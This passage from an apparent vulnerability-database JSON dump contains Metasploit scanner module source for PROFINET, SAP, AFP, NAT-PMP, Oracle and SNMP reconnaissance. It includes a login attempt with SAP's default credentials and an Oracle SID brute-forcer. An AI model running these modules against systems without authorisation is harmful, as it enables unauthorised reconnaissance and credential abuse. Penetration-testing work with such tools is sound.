* 2 + block_length * 2 - 1])\n print_line(\"Name of station: #{name_of_station}\")\n when '0203'\n vendor_id = parse_vendorid(block[6 * 2..8 * 2 - 1])\n device_id = parse_deviceid(block[8 * 2..10 * 2 - 1])\n print_line(\"Vendor and Device Type: #{vendor_id}, #{device_id}\")\n when '0204'\n device_role = parse_devicerole(block[6 * 2..7 * 2 - 1])\n print_line(\"Device Role: #{device_role}\")\n when '0102'\n ip = hex_to_address(block[6 * 2..10 * 2 - 1])\n snm = hex_to_address(block[10 * 2..14 * 2 - 1])\n gw = hex_to_address(block[14 * 2..18 * 2 - 1])\n print_line(\"IP, Subnetmask and Gateway are: #{ip}, #{snm}, #{gw}\")\n end\n end\n\n def parse_profinet(data)\n data_to_parse = data[24..-1]\n\n until data_to_parse.empty?\n block_length = data_to_parse[2 * 2..4 * 2 - 1].to_i(16)\n block = data_to_parse[0..(4 + block_length) * 2 - 1]\n\n parse_block(block, block_length)\n\n padding = block_length % 2\n data_to_parse = data_to_parse[(4 + block_length + padding) * 2..-1]\n end\n end\n\n def receive(iface, answertime)\n capture = 
PacketFu::Capture.new(iface: iface, start: true, filter: 'ether proto 0x8892')\n sleep answertime\n capture.save\n i = 0\n capture.array.each do |packet|\n data = bin_to_hex(packet).downcase\n mac = data[12..13] + ':' + data[14..15] + ':' + data[16..17] + ':' + data[18..19] + ':' + data[20..21] + ':' + data[22..23]\n next unless data[28..31] == 'feff'\n print_good(\"Parsing packet from #{mac}\")\n parse_profinet(data[28..-1])\n print_line('')\n i += 1\n end\n if i.zero?\n print_warning('No devices found, maybe you are running virtually?')\n else\n print_good(\"I found #{i} devices for you!\")\n end\n end\n\n def run\n iface = datastore['INTERFACE']\n answertime = datastore['ANSWERTIME']\n packet = \"\\x00\\x00\\x88\\x92\\xfe\\xfe\\x05\\x00\\x04\\x00\\x00\\x03\\x00\\x80\\x00\\x04\\xff\\xff\\x00\\x00\\x00\\x00\"\n packet += \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n eth_pkt = PacketFu::EthPacket.new\n begin\n eth_pkt.eth_src = PacketFu::Utils.whoami?(iface: iface)[:eth_src]\n rescue\n print_error(\"Error: interface #{iface} not active?\")\n return\n end\n eth_pkt.eth_daddr = \"01:0e:cf:00:00:00\"\n eth_pkt.eth_proto = 0x8100\n eth_pkt.payload = packet\n print_status(\"Sending packet out to #{iface}\")\n eth_pkt.to_w(iface)\n\n receive(iface, answertime)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/scada/profinet_siemens.rb"}, {"lastseen": "2019-12-09T18:28:29", "bulletinFamily": "exploit", "description": "This module attempts to identify software, OS and DB versions through the SAP function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.\n", "modified": "2017-07-24T13:26:21", "published": "2012-11-16T18:20:58", "id": "MSF:AUXILIARY/SCANNER/SAP/SAP_SOAP_TH_SAPREL_DISCLOSURE", "href": "", "type": "metasploit", "title": "SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL 
Function Information Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy. I'd also like to thank Chris John Riley,\n# Ian de Villiers and Joris van de Vis who have Beta tested the modules and\n# provided excellent feedback. Some people just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure',\n 'Description' => %q{\n This module attempts to identify software, OS and DB versions through the SAP\n function TH_SAPREL using the /sap/bc/soap/rfc SOAP service.\n },\n 'References' =>\n [\n [ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]\n ],\n 'Author' =>\n [\n 'Agnivesh Sathasivam',\n 'nmonkee'\n ],\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('CLIENT', [true, 'SAP Client', '001']),\n OptString.new('HttpUsername', [true, 'Username', 'SAP*']),\n OptString.new('HttpPassword', [true, 'Password', '06071992'])\n ])\n end\n\n def run_host(ip)\n\n data = '<?xml version=\"1.0\" encoding=\"utf-8\" ?>'\n data << '<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">'\n data << '<env:Body>'\n data << '<n1:TH_SAPREL 
xmlns:n1=\"urn:sap-com:document:sap:rfc:functions\" env:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">'\n data << '</n1:TH_SAPREL>'\n data << '</env:Body>'\n data << '</env:Envelope>'\n\n print_status(\"[SAP] #{ip}:#{rport} - sending SOAP TH_SAPREL request\")\n\n begin\n res = send_request_cgi({\n 'uri' => '/sap/bc/soap/rfc',\n 'method' => 'POST',\n 'data' => data,\n 'cookie' => \"sap-usercontext=sap-language=EN&sap-client=#{datastore['CLIENT']}\",\n 'ctype' => 'text/xml; charset=UTF-8',\n 'encode_params' => false,\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'headers' => {\n 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',\n },\n 'vars_get' => {\n 'sap-client' => datastore['CLIENT'],\n 'sap-language' => 'EN'\n }\n })\n if res and res.code == 200\n kern_comp_on = $1 if res.body =~ /<KERN_COMP_ON>(.*)<\\/KERN_COMP_ON>/i\n kern_comp_time = $1 if res.body =~ /<KERN_COMP_TIME>(.*)<\\/KERN_COMP_TIME>/i\n kern_dblib = $1 if res.body =~ /<KERN_DBLIB>(.*)<\\/KERN_DBLIB>/i\n kern_patchlevel = $1 if res.body =~ /<KERN_PATCHLEVEL>(.*)<\\/KERN_PATCHLEVEL>/i\n kern_rel = $1 if res.body =~ /<KERN_REL>(.*)<\\/KERN_REL>/i\n saptbl = Msf::Ui::Console::Table.new(\n Msf::Ui::Console::Table::Style::Default,\n 'Header' => \"[SAP] System Info\",\n 'Prefix' => \"\\n\",\n 'Postfix' => \"\\n\",\n 'Indent' => 1,\n 'Columns' =>\n [\n \"Info\",\n \"Value\"\n ])\n saptbl << [ \"OS Kernel version\", kern_comp_on ]\n saptbl << [ \"SAP compile time\", kern_comp_time ]\n saptbl << [ \"DB version\", kern_dblib ]\n saptbl << [ \"SAP patch level\", kern_patchlevel ]\n saptbl << [ \"SAP Version\", kern_rel ]\n print(saptbl.to_s)\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'os.kernel.version',\n :data => \"OS Kernel version: #{kern_comp_on}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'sap.time.compile',\n :data => \"SAP 
compile time: #{kern_comp_time}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'sap.db.version',\n :data => \"DB version: #{kern_dblib}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'sap',\n :type => 'sap.version.patch_level',\n :data => \"SAP patch level: #{kern_patchlevel}\"\n )\n\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :type => 'sap.version',\n :data => \"SAP Version: #{kern_rel}\"\n )\n\n elsif res and res.code == 500\n response = res.body\n error.push(response.scan(%r{<message>(.*?)</message>}))\n err = error.join().chomp\n print_error(\"[SAP] #{ip}:#{rport} - #{err.gsub(''','\\'')}\")\n return\n else\n print_error(\"[SAP] #{ip}:#{rport} - error message: \" + res.code.to_s + \" \" + res.message) if res\n return\n end\n rescue ::Rex::ConnectionError\n print_error(\"[SAP] #{ip}:#{rport} - Unable to connect\")\n return\n end\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sap/sap_soap_th_saprel_disclosure.rb"}, {"lastseen": "2019-10-23T02:19:15", "bulletinFamily": "exploit", "description": "This module fetches AFP server information, including server name, network address, supported AFP versions, signature, machine type, and server flags.\n", "modified": "2019-03-05T09:38:51", "published": "2012-03-02T19:58:40", "id": "MSF:AUXILIARY/SCANNER/AFP/AFP_SERVER_INFO", "href": "", "type": "metasploit", "title": "Apple Filing Protocol Info Enumerator", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Exploit::Remote::AFP\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Apple Filing Protocol 
Info Enumerator',\n 'Description' => %q{\n This module fetches AFP server information, including server name,\n network address, supported AFP versions, signature, machine type,\n and server flags.\n },\n 'References' =>\n [\n [ 'URL', 'https://developer.apple.com/library/mac/documentation/Networking/Reference/AFP_Reference/Reference/reference.html' ]\n ],\n 'Author' => [ 'Gregory Man <man.gregory[at]gmail.com>' ],\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n print_status(\"AFP #{ip} Scanning...\")\n begin\n connect\n response = get_info\n report(response)\n rescue ::Timeout::Error\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionError, ::IOError, ::Errno::ECONNRESET, ::Errno::ENOPROTOOPT\n rescue ::Exception\n raise $!\n print_error(\"AFP #{rhost}:#{rport} #{$!.class} #{$!}\")\n ensure\n disconnect\n end\n end\n\n def report(response)\n report_info = \"AFP #{rhost}:#{rport} Server Name: #{response[:server_name]} \\n\" +\n \"AFP #{rhost}:#{rport} Server Flags: \\n\" +\n format_flags_report(response[:server_flags]) +\n \"AFP #{rhost}:#{rport} Machine Type: #{response[:machine_type]} \\n\" +\n \"AFP #{rhost}:#{rport} AFP Versions: #{response[:versions].join(', ')} \\n\" +\n \"AFP #{rhost}:#{rport} UAMs: #{response[:uams].join(', ')}\\n\" +\n \"AFP #{rhost}:#{rport} Server Signature: #{response[:signature]}\\n\" +\n \"AFP #{rhost}:#{rport} Server Network Address: \\n\" +\n format_addresses_report(response[:network_addresses]) +\n \"AFP #{rhost}:#{rport} UTF8 Server Name: #{response[:utf8_server_name]}\"\n\n\n lines = \"AFP #{rhost}:#{rport}:#{rport} AFP:\\n#{report_info}\"\n\n lines.split(/\\n/).each do |line|\n print_status(line)\n end\n\n report_note(:host => datastore['RHOST'],\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :type => 'afp_server_info',\n :data => response)\n\n report_service(\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :proto => 'tcp',\n :name => \"afp\",\n :info => \"AFP name: 
#{response[:utf8_server_name]}, Versions: #{response[:versions].join(', ')}\"\n )\n\n end\n\n def format_flags_report(parsed_flags)\n report = ''\n parsed_flags.each do |flag, val|\n report << \"AFP #{rhost}:#{rport} * #{flag}: #{val.to_s} \\n\"\n end\n return report\n end\n\n def format_addresses_report(parsed_network_addresses)\n report = ''\n parsed_network_addresses.each do |val|\n report << \"AFP #{rhost}:#{rport} * #{val.to_s} \\n\"\n end\n return report\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/afp/afp_server_info.rb"}, {"lastseen": "2019-11-06T10:57:36", "bulletinFamily": "exploit", "description": "Scan NAT devices for their external listening ports using NAT-PMP\n", "modified": "2017-07-24T13:26:21", "published": "2012-01-24T16:16:56", "id": "MSF:AUXILIARY/SCANNER/NATPMP/NATPMP_PORTSCAN", "href": "", "type": "metasploit", "title": "NAT-PMP External Port Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::NATPMP\n include Rex::Proto::NATPMP\n\n def initialize\n super(\n 'Name' => 'NAT-PMP External Port Scanner',\n 'Description' => 'Scan NAT devices for their external listening ports using NAT-PMP',\n 'Author' => 'Jon Hart <jhart[at]spoofed.org>',\n 'License' => MSF_LICENSE\n )\n\n register_options(\n [\n OptString.new('PORTS', [true, \"Ports to scan (e.g. 
22-25,80,110-900)\", \"1-1000\"])\n ])\n end\n\n def run_host(host)\n begin\n udp_sock = Rex::Socket::Udp.create({\n 'LocalHost' => datastore['CHOST'] || nil,\n 'Context' => {'Msf' => framework, 'MsfExploit' => self} }\n )\n add_socket(udp_sock)\n peer = \"#{host}:#{datastore['RPORT']}\"\n vprint_status(\"#{peer} Scanning #{protocol} ports #{datastore['PORTS']} using NATPMP\")\n\n external_address = get_external_address(udp_sock, host, datastore['RPORT'])\n if (external_address)\n print_good(\"#{peer} responded with external address of #{external_address}\")\n else\n vprint_status(\"#{peer} didn't respond with an external address\")\n return\n end\n\n # clear all mappings\n map_port(udp_sock, host, datastore['RPORT'], 0, 0, Rex::Proto::NATPMP.const_get(protocol), 0)\n\n Rex::Socket.portspec_crack(datastore['PORTS']).each do |port|\n map_req = map_port_request(port, port, Rex::Proto::NATPMP.const_get(datastore['PROTOCOL']), 1)\n udp_sock.sendto(map_req, host, datastore['RPORT'], 0)\n while (r = udp_sock.recvfrom(16, 1.0) and r[1])\n break if handle_reply(host, external_address, r)\n end\n end\n\n rescue ::Interrupt\n raise $!\n rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused\n nil\n rescue ::Exception => e\n print_error(\"Unknown error: #{e.class} #{e.backtrace}\")\n end\n end\n\n def handle_reply(host, external_addr, pkt)\n return if not pkt[1]\n\n if(pkt[1] =~ /^::ffff:/)\n pkt[1] = pkt[1].sub(/^::ffff:/, '')\n end\n host = pkt[1]\n protocol = datastore['PROTOCOL'].to_s.downcase\n\n (ver, op, result, epoch, int, ext, lifetime) = parse_map_port_response(pkt[0])\n peer = \"#{host}:#{datastore['RPORT']}\"\n if (result == 0)\n # we always ask to map an external port to the same port on us. 
If\n # we get a successful reponse back but the port we requested be forwarded\n # is different, that means that someone else already has it open\n if (int != ext)\n state = Msf::ServiceState::Open\n print_good(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of successful mapping with unmatched ports\")\n if inside_workspace_boundary?(external_addr)\n report_service(\n :host => external_addr,\n :port => int,\n :proto => protocol,\n :state => state\n )\n end\n else\n state = Msf::ServiceState::Closed\n vprint_error(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of successful mapping with matched ports\")\n end\n else\n state = Msf::ServiceState::Closed\n vprint_error(\"#{peer} #{external_addr} - #{int}/#{protocol} #{state} because of code #{result} response\")\n end\n\n report_service(\n :host \t=> host,\n :port \t=> pkt[2],\n :name \t=> 'natpmp',\n :proto \t=> 'udp',\n :state\t=> Msf::ServiceState::Open\n )\n true\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/natpmp/natpmp_portscan.rb"}, {"lastseen": "2019-12-09T08:59:21", "bulletinFamily": "exploit", "description": "This module queries the TNS listener for a valid Oracle database instance name (also known as a SID). Any response other than a \"reject\" will be considered a success. If a specific SID is provided, that SID will be attempted. 
Otherwise, SIDs read from the named file will be attempted in sequence instead.\n", "modified": "2019-04-26T13:36:32", "published": "2011-03-09T22:15:15", "id": "MSF:AUXILIARY/SCANNER/ORACLE/SID_BRUTE", "href": "", "type": "metasploit", "title": "Oracle TNS Listener SID Bruteforce", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TNS\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::AuthBrute # Actually, doesn't use much here, but there's a couple handy functions.\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Oracle TNS Listener SID Bruteforce',\n 'Description' => %q{\n This module queries the TNS listener for a valid Oracle database\n instance name (also known as a SID).\n Any response other than a \"reject\" will be considered a success.\n If a specific SID is provided, that SID will be attempted. Otherwise,\n SIDs read from the named file will be attempted in sequence instead.\n },\n 'Author' => [ 'todb' ],\n 'License' => MSF_LICENSE\n ))\n\n register_options(\n [\n OptPath.new('SID_FILE', [ false, \"File containing instance names, one per line\", File.join(Msf::Config.data_directory, \"wordlists\", \"sid.txt\") ]),\n OptString.new('SID', [ false, 'A specific SID to attempt.' 
]),\n Opt::RPORT(1521)\n ])\n\n deregister_options(\n \"USERNAME\", \"PASSWORD\", \"USER_FILE\", \"PASS_FILE\", \"USERPASS_FILE\",\n \"BLANK_PASSWORDS\", \"USER_AS_PASS\", \"REMOVE_USER_FILE\", \"REMOVE_PASS_FILE\",\n \"REMOVE_USERPASS_FILE\"\n )\n end\n\n def build_sid_request(sid,ip)\n connect_data = \"(DESCRIPTION=(CONNECT_DATA=(SID=#{sid})(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=#{ip})(PORT=#{rport})))\"\n pkt = tns_packet(connect_data)\n end\n\n def hostport\n [target_host,rport].join(\":\")\n end\n\n def check_sid(sid,ip)\n pkt = build_sid_request(sid,ip)\n sock.put(pkt)\n data = sock.get_once || ''\n parse_response(data)\n end\n\n def parse_response(data)\n return unless data\n len,sum,type,r,hsum,rest = data.unpack(\"nnCCnA*\")\n type # 2 is \"accept\", 11 is resend. Usually you get 11, then 2. 4 is refuse.\n end\n\n def do_sid_check(sid,ip)\n begin\n connect\n response_code = check_sid(sid,ip)\n if response_code.nil?\n print_status \"#{hostport} Oracle - No response given, something is wrong.\"\n return :abort\n elsif response_code != 4\n print_good \"#{hostport} Oracle - '#{sid}' is valid\"\n report_note(\n :host => ip,\n :proto => 'tcp',\n :port => rport,\n :sname => 'oracle',\n :type => \"oracle.sid\",\n :data => sid,\n :update => :unique_data\n )\n return :success\n else\n vprint_status \"#{hostport} Oracle - Refused '#{sid}'\"\n return :fail\n end\n rescue ::Rex::ConnectionError, ::Errno::EPIPE\n print_error(\"#{hostport} Oracle - unable to connect to a TNS listener\")\n return :abort\n ensure\n disconnect\n end\n end\n\n # Based vaguely on each_user_pass in AuthBrute\n def each_sid(&block)\n @@oracle_sid_fail = []\n @@oracle_sid_success = []\n if datastore['SID'].nil? 
|| datastore['SID'].empty?\n sids = extract_words(datastore['SID_FILE']).map {|s| s.to_s.strip.upcase}.uniq\n else\n sids = [datastore['SID'].to_s.strip.upcase]\n end\n print_status \"Checking #{sids.size} SID#{sids.size != 1 && \"s\"} against #{hostport}\"\n sids.each do |s|\n userpass_sleep_interval unless (@@oracle_sid_fail | @@oracle_sid_success).empty?\n next if @@oracle_sid_fail.include?(s) || @@oracle_sid_success.include?(s)\n ret = block.call(s)\n case ret\n when :abort\n break\n when :success\n @@oracle_sid_success << s\n break if datastore[\"STOP_ON_SUCCESS\"]\n when :fail\n @@oracle_sid_fail << s\n end\n end\n end\n\n def run_host(ip)\n each_sid do |sid|\n vprint_status \"#{hostport} Oracle - Checking '#{sid}'...\"\n do_sid_check(sid,ip)\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/sid_brute.rb"}, {"lastseen": "2019-11-06T06:11:37", "bulletinFamily": "exploit", "description": "This module allows enumeration of any devices with SNMP protocol support. It supports hardware, software, and network information. The default community used is \"public\".\n", "modified": "2019-07-02T19:14:55", "published": "2010-12-25T06:31:38", "id": "MSF:AUXILIARY/SCANNER/SNMP/SNMP_ENUM", "href": "", "type": "metasploit", "title": "SNMP Enumeration Module", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SNMP Enumeration Module',\n 'Description' => 'This module allows enumeration of any devices with SNMP\n protocol support. 
It supports hardware, software, and network information.\n The default community used is \"public\".',\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],\n [ 'URL', 'http://net-snmp.sourceforge.net/docs/man/snmpwalk.html' ],\n [ 'URL', 'http://www.nothink.org/perl/snmpcheck/' ],\n ],\n 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n\n begin\n snmp = connect_snmp\n\n fields_order = [\n \"Host IP\", \"Hostname\", \"Description\", \"Contact\",\n \"Location\", \"Uptime snmp\", \"Uptime system\",\n \"System date\", \"domain\", \"User accounts\",\n \"Network information\", \"Network interfaces\",\n \"Network IP\", \"Routing information\",\n \"TCP connections and listening ports\", \"Listening UDP ports\",\n \"Network services\", \"Share\", \"IIS server information\",\n \"Storage information\", \"File system information\",\n \"Device information\", \"Software components\",\n \"Processes\"\n ]\n\n output_data = {}\n output_data = {\"Host IP\"=>ip}\n\n sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s\n output_data[\"Hostname\"] = sysName.strip\n\n # print connected status after the first query so if there are\n # any timeout or connectivity errors; the code would already\n # have jumped to error handling where the error status is\n # already being displayed.\n print_good(\"#{ip}, Connected.\")\n\n sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s\n sysDesc.gsub!(/^\\s+|\\s+$|\\n+|\\r+/, ' ')\n output_data[\"Description\"] = sysDesc.strip\n\n sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s\n output_data[\"Contact\"] = sysContact.strip\n\n sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s\n output_data[\"Location\"] = sysLocation.strip\n\n sysUpTimeInstance = snmp.get_value('1.3.6.1.2.1.1.3.0').to_s\n output_data[\"Uptime system\"] = sysUpTimeInstance.strip\n\n hrSystemUptime = snmp.get_value('1.3.6.1.2.1.25.1.1.0').to_s\n output_data[\"Uptime 
snmp\"] = hrSystemUptime.strip\n hrSystemUptime = '-' if hrSystemUptime.to_s =~ /Null/\n\n year = month = day = hour = minutes = seconds = tenths = 0\n\n systemDate = snmp.get_value('1.3.6.1.2.1.25.1.2.0')\n str = systemDate.to_s\n if (str.empty? or str =~ /Null/ or str =~ /^noSuch/)\n output_data[\"System date\"] = '-'\n else\n\n # RFC 2579 - Textual Conventions for SMIv2\n # http://www.faqs.org/rfcs/rfc2579.html\n\n systemDate = systemDate.unpack('C*')\n\n year = systemDate[0] * 256 + systemDate[1]\n month = systemDate[2] || 0\n day = systemDate[3] || 0\n hour = systemDate[4] || 0\n minutes = systemDate[5] || 0\n seconds = systemDate[6] || 0\n tenths = systemDate[7] || 0\n output_data[\"System date\"] = sprintf(\"%d-%d-%d %02d:%02d:%02d.%d\", year, month, day, hour, minutes, seconds, tenths)\n end\n\n if (sysDesc =~ /Windows/)\n domPrimaryDomain = snmp.get_value('1.3.6.1.4.1.77.1.4.1.0').to_s\n\n output_data[\"Domain\"] = domPrimaryDomain.strip\n\n users = []\n\n snmp.walk([\"1.3.6.1.4.1.77.1.2.25.1.1\",\"1.3.6.1.4.1.77.1.2.25.1\"]) do |user,entry|\n users.push([[user.value]])\n end\n\n if not users.empty?\n output_data[\"User accounts\"] = users\n end\n end\n\n network_information = {}\n\n ipForwarding = snmp.get_value('1.3.6.1.2.1.4.1.0')\n\n if ipForwarding == 0 || ipForwarding == 2\n ipForwarding = \"no\"\n network_information[\"IP forwarding enabled\"] = ipForwarding\n elsif ipForwarding == 1\n ipForwarding = \"yes\"\n network_information[\"IP forwarding enabled\"] = ipForwarding\n end\n\n ipDefaultTTL = snmp.get_value('1.3.6.1.2.1.4.2.0')\n if ipDefaultTTL.to_s !~ /Null/\n network_information[\"Default TTL\"] = ipDefaultTTL\n end\n\n tcpInSegs = snmp.get_value('1.3.6.1.2.1.6.10.0')\n if tcpInSegs.to_s !~ /Null/\n network_information[\"TCP segments received\"] = tcpInSegs\n end\n\n tcpOutSegs = snmp.get_value('1.3.6.1.2.1.6.11.0')\n if tcpOutSegs.to_s !~ /Null/\n network_information[\"TCP segments sent\"] = tcpOutSegs\n end\n\n tcpRetransSegs = 
snmp.get_value('1.3.6.1.2.1.6.12.0')\n if tcpRetransSegs.to_s !~ /Null/\n network_information[\"TCP segments retrans\"] = tcpRetransSegs\n end\n\n ipInReceives = snmp.get_value('1.3.6.1.2.1.4.3.0')\n if ipInReceives.to_s !~ /Null/\n network_information[\"Input datagrams\"] = ipInReceives\n end\n\n ipInDelivers = snmp.get_value('1.3.6.1.2.1.4.9.0')\n if ipInDelivers.to_s !~ /Null/\n network_information[\"Delivered datagrams\"]=ipInDelivers\n end\n\n ipOutRequests = snmp.get_value('1.3.6.1.2.1.4.10.0')\n if ipOutRequests.to_s !~ /Null/\n network_information[\"Output datagrams\"]=ipOutRequests\n end\n\n if not network_information.empty?\n output_data[\"Network information\"] = network_information\n end\n\n network_interfaces = []\n\n snmp.walk([\n \"1.3.6.1.2.1.2.2.1.1\", \"1.3.6.1.2.1.2.2.1.2\", \"1.3.6.1.2.1.2.2.1.6\",\n \"1.3.6.1.2.1.2.2.1.3\", \"1.3.6.1.2.1.2.2.1.4\", \"1.3.6.1.2.1.2.2.1.5\",\n \"1.3.6.1.2.1.2.2.1.10\", \"1.3.6.1.2.1.2.2.1.16\", \"1.3.6.1.2.1.2.2.1.7\"\n ]) do |index,descr,mac,type,mtu,speed,inoc,outoc,status|\n\n ifindex = index.value\n ifdescr = descr.value\n ifmac = mac.value.to_s =~ /noSuchInstance/ ? 'unknown' : mac.value.unpack(\"H2H2H2H2H2H2\").join(\":\")\n iftype = type.value\n ifmtu = mtu.value\n ifspeed = speed.value.to_s =~ /noSuchInstance/ ? 
'unknown' : speed.value.to_i / 1000000\n ifinoc = inoc.value\n ifoutoc = outoc.value\n ifstatus = status.value\n\n case iftype\n when 1\n iftype = \"other\"\n when 2\n iftype = \"regular1822\"\n when 3\n iftype = \"hdh1822\"\n when 4\n iftype = \"ddn-x25\"\n when 5\n iftype = \"rfc877-x25\"\n when 6\n iftype = \"ethernet-csmacd\"\n when 7\n iftype = \"iso88023-csmacd\"\n when 8\n iftype = \"iso88024-tokenBus\"\n when 9\n iftype = \"iso88025-tokenRing\"\n when 10\n iftype = \"iso88026-man\"\n when 11\n iftype = \"starLan\"\n when 12\n iftype = \"proteon-10Mbit\"\n when 13\n iftype = \"proteon-80Mbit\"\n when 14\n iftype = \"hyperchannel\"\n when 15\n iftype = \"fddi\"\n when 16\n iftype = \"lapb\"\n when 17\n iftype = \"sdlc\"\n when 18\n iftype = \"ds1\"\n when 19\n iftype = \"e1\"\n when 20\n iftype = \"basicISDN\"\n when 21\n iftype = \"primaryISDN\"\n when 22\n iftype = \"propPointToPointSerial\"\n when 23\n iftype = \"ppp\"\n when 24\n iftype = \"softwareLoopback\"\n when 25\n iftype = \"eon\"\n when 26\n iftype = \"ethernet-3Mbit\"\n when 27\n iftype = \"nsip\"\n when 28\n iftype = \"slip\"\n when 29\n iftype = \"ultra\"\n when 30\n iftype = \"ds3\"\n when 31\n iftype = \"sip\"\n when 32\n iftype = \"frame-relay\"\n else\n iftype = \"unknown\"\n end\n\n case ifstatus\n when 1\n ifstatus = \"up\"\n when 2\n ifstatus = \"down\"\n when 3\n ifstatus = \"testing\"\n else\n ifstatus = \"unknown\"\n end\n\n network_interfaces.push({\n \"Interface\" => \"[ #{ifstatus} ] #{ifdescr}\",\n \"Id\" => ifindex,\n \"Mac Address\" => ifmac,\n \"Type\" => iftype,\n \"Speed\" => \"#{ifspeed} Mbps\",\n \"MTU\" => ifmtu,\n \"In octets\" => ifinoc,\n \"Out octets\" => ifoutoc\n })\n end\n\n if not network_interfaces.empty?\n output_data[\"Network interfaces\"] = network_interfaces\n end\n\n network_ip = []\n\n snmp.walk([\n \"1.3.6.1.2.1.4.20.1.2\", \"1.3.6.1.2.1.4.20.1.1\",\n \"1.3.6.1.2.1.4.20.1.3\", \"1.3.6.1.2.1.4.20.1.4\"\n ]) do |ifid,ipaddr,netmask,bcast|\n 
